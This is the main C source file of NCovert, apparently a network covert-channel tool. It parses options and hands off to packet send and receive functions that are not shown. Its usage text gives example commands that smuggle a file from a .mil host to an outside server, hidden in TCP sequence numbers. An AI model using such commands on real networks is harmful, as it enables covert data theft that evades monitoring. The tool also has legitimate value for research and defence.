/* 
 * ncovert.c - main prog file, includes help files and processes args
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "ncovert.h"

void print_ver(void)
{
	printf("NCovert %s  - NMRC Covert Channel\n",VERSION);
	printf("Simple Nomad - <thegnome@nmrc.org>\n");
	printf("Based in part on Chris Rouland's covert_tcp.\n");
}

void usage(char *p)
{
	printf("Usage:");
	printf("%s -d dst_ip -s src_ip -f file -l local_port -p dest_port [options]\n\n", p);
	printf("Options include:\n");
	printf("  -S            server mode\n");
	printf("  -t <timeout>  timeout in seconds, server mode only (default 10)\n");
	printf("  -h            this help screen\n\n");
	printf("Example:\n");
	printf("ncovert -s gibraltar.ncsc.mil -d nmrc.org -l 1234 -p 80 -f pr0n.tgz\n\n");
	printf("Above sends the file pr0n.tgz from gibraltar to nmrc one four-byte \n");
	printf("chunk at a time via the sequence number.\n\n");
	printf("Example:\n");
	printf("ncovert -s gibraltar.ncsc.mil -d nmrc.org -p 80 -S -f pr0n.tgz\n\n");
	printf("Above listens passively for packets from gibraltar.ncsc.mil\n");
	printf("destined for port 80. It takes the data and saves the file locally\n");
	printf("as pr0n.tgz\n\n");
	exit(0);
}

int main(int argc, char **argv)
{
	unsigned int source_host=0,dest_host=0;
	unsigned short source_port=0,dest_port=80;
	int ack=0,server=0,file=0,ver=0,quiet=0;
	char ch;
	char *prog;
	char desthost[80],srchost[80],filename[80];
	
	prog = argv[0];
	timeout = 10;
	verbose = 0;
	
	while ((ch = getopt(argc, argv, "hf:s:d:p:l:t:SaVvq")) != EOF)
		switch(ch)
		{
			case 'h':
				usage(prog);
				exit(0);
			case 'f':
				strncpy(filename,optarg,79);
				file=1;
				break;
			case 's':
				source_host=host_convert(optarg);
				strncpy(srchost,optarg,79);
				break;
			case 'd':
				dest_host=host_convert(optarg);
				strncpy(desthost,optarg,79);
				break;
			case 'p':
				dest_port=atoi(optarg);
				break;
			case 'l':
				source_port=atoi(optarg);
				break;
			case 't':
				timeout=atoi(optarg);
				break;
			case 'S':
				server=1;
				break;
			case 'a':
				ack=1;
				break;
			case 'V':
				ver=1;
				break;
			case 'v':
				verbose++;
				break;
			case 'q':
				quiet++;
				break;
			default:
				usage(prog);
				exit(-1);
		}

	if(ver)
	{
		print_ver();
		exit(0);
	}

	if(verbose && quiet)
	{
		printf("\n*** You can't choose both verbose and quiet modes\n\n");
		usage(prog);
		exit(-1);
	}

	if(!quiet) print_ver();
	
	if(geteuid() !=0)
	{
		printf("\n*** You need to be root to run this.\n\n");
		exit(0);
	}
	if(file != 1)
	{
		printf("\n*** You must supply a filename\n\n");
		usage(prog);
		exit(1);
	}
	
	if(server==0) /* if they want to be a client do this... */
	{   
		if (source_host == 0 && dest_host == 0)
		{
			printf("\nYou must supply a source and destination IP for sending packets\n\n");
			usage(prog);
			exit(1);
		}
		else if (ack == 1)
		{
			printf("\nAck decoding can only be used in server (-S) mode\n\n");
			exit(1);
		}
		else if (verbose)
		{
			printf("Destination Host: %s\n",desthost);
			printf("Source Host     : %s\n",srchost);
			if(source_port == 0)
				printf("Originating Port: random\n");
			else
				printf("Originating Port: %u\n",source_port);
			printf("Destination Port: %u\n",dest_port);
			printf("Encoded Filename: %s\n",filename);
			printf("\nClient Mode: Sending data.\n\n");
		} 
		send_packets(source_host,dest_host,source_port,dest_port,filename,quiet);
	}
	else /* server mode it is */
	{    
		if (source_host == 0 && source_port == 0)
		{
			printf("You need to supply a source address and/or source port for server mode.\n");
			exit(1);
		}
		if(verbose)
		{
			if(dest_host == 0) /* if not host given, listen for anything.. */
				strcpy(desthost,"Any Host");
			if(source_host == 0)
				strcpy(srchost,"Any Host");
			printf("Listening for data from IP: %s\n",srchost);
			if(source_port == 0)
				printf("Listening for data bound from port: Any Port to port: %u\n",dest_port);
			else
				printf("Listening for data bound from port: %u to port: %u\n",source_port,dest_port);
			printf("Decoded Filename: %s\n",filename);
			printf("\nServer Mode: Listening for data.\n\n");
		}
		recv_packets(source_host,dest_host,source_port,dest_port,filename,ack,quiet);
	}
	exit(0);
}
